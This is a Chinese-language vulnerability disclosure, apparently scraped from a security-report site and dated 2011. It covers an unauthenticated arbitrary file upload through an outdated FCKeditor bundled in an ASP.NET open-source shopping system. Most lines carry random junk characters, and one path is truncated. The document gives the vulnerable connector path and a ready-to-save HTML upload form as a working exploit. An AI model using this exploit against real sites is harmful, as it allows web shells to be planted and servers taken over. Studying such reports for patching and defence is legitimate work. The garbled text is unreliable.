披露状态:2011-07-19: 细节已通知厂商并且等待厂商处理中4 F! F8 T! b, F3 N& x6 g
2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开
E* E& d) X4 ?: X# m1 k0 k i( l 简要描述:这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。; W) V8 Q$ K! l+ G, ^
详细说明:其他版本我没测试,估计也是一样的问题; E+ n, p' ?, E* h5 P& Y: N
http://127.0.0.1/controls/fckedi ... aspx/connector.aspx
T/ }: S) |9 z% J 跳转到网站根目录上传任意文件。
9 z, P1 k. l& E- J7 g l 漏洞证明:如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
$ j2 A; _$ d7 j: i( N+ a* y <form id="frmUpload" enctype="multipart/form-data" action="http://127.0.0.1/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">0 l( u- J: V! ~# }$ ]3 r
Upload a new file:<br>& ^" a- X: p. I$ w1 L/ e
<input type="file" name="NewFile" size="50"><br>
/ L9 j- m; W" i9 }! } <input id="btnUpload" type="submit" value="Upload">
6 y1 M4 N( C( R* m </form> |